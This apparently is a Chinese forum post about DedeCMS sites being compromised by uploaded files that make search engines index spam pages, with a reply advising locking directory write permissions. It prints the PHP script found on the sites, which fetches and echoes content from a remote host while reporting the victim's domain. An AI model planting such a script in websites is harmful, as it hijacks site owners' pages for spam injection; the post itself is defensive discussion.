[导读]:发现很多织梦站,被上传了文件,导致收录了很多木马页面, 木马程序: set_time_limit(0); header("Content-Type: text/html;charset=gb2312"); date_default_timezone_set('PRC'); $Remote_server = "www.site.co...
发现很多织梦站,被上传了文件,导致收录了很多木马页面,
木马程序:
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$Remote_server = "www.site.com";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($Remote_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);
echo $Content_mb;
?>
文件被上传到了静态目录页面,
静态目录文件权限:755 ;修改过文件权限的执行权限,发现后台生成静态页面失败,
请有遇到此问题的同学一起讨论。
织梦用的人太多了。漏洞被放大
最表态设置目录权限 禁止写入权限,然后生成文章html的时候 放开权限,完事之后在恢复权限,织梦只能这样才能保险
本文来自投稿,不代表微盟圈立场,如若转载,请注明出处:https://www.vm7.com/a/ask/79401.html
